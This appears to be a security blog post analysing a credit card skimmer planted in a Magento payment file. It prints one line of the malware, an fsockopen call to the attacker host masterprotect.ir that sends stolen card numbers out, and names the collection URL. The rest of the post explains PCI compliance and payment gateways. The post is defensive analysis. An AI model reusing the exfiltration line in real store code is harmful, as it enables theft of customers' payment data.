With about 30% of the market share, Magento is gradually becoming a “WordPress” of the ecommerce world. Like WordPress, it becomes a major target for hackers due to its popularity. However, in the case of Magento, the main goal that hackers pursue is to steal money, either from shop customers or the shop owners.
During the last year we described quite a few Magento attacks that steal customer credit cards. While most of them target the app/code/core/Mage/Payment/Model/Method/Cc.php it’s not the only file that you should be watching.
For example, the following malware was injected into the importData function in the includes/src/Mage_Sales_Model_Quote_Payment.php file
The four lines with encrypted code that begin with $Magimo really stick out when you look through the file. And while Magimo may look like something inherent to Magento where many modules and variables have names that begin with “Mag”, we are not aware of any Magento software using it. There is a premium WordPress theme called Magimo, but it isn’t involved.
Here’s the decoded version:
It checks if the function data contains credit card number and sends it to masterprotect[.]ir/1/56.php
As you might noticed, SSL is important not only to online store owners and customers, but also to the thieves who use the TLS protocol to transfer stolen credit card details to their own server. You can see the attackers using the TLS protocol in the screenshot above:
fsockopen('tls://masterprotect.ir', 443, $r1, $r2, 3);
The Illusion of PCI Compliance in Magento
There is a common misunderstanding among owners of Magento sites. Some think that Magento is PCI compliant if they use SSL for their order forms. This is not true. Actually, the vast majority of Magento sites that process payments themselves are not PCI compliant. This means they are susceptible to attacks that steal customer credit card details. On the other hand, Magento provides methods that allow website owners to achieve PCI compliance:
Magento makes PCI compliance easier by offering integrated payment gateways that allow merchants to securely transmit credit card data via direct post API methods or with hosted payment forms provided by the payment gateway integrated with the merchant’s checkout pages. The Direct Post method allows for information to be sent directly to the payment gateway without sensitive data flowing through or stored on the Magento application server.
If you want to be PCI compliant but don’t have a dedicated professional security staff working with your site on a daily basis, you have to avoid processing payments on your server.
If you have questions about what PCI compliance is, and how you can achieve it for your ecommerce site, read our Introduction to E-Commerce and PCI Compliance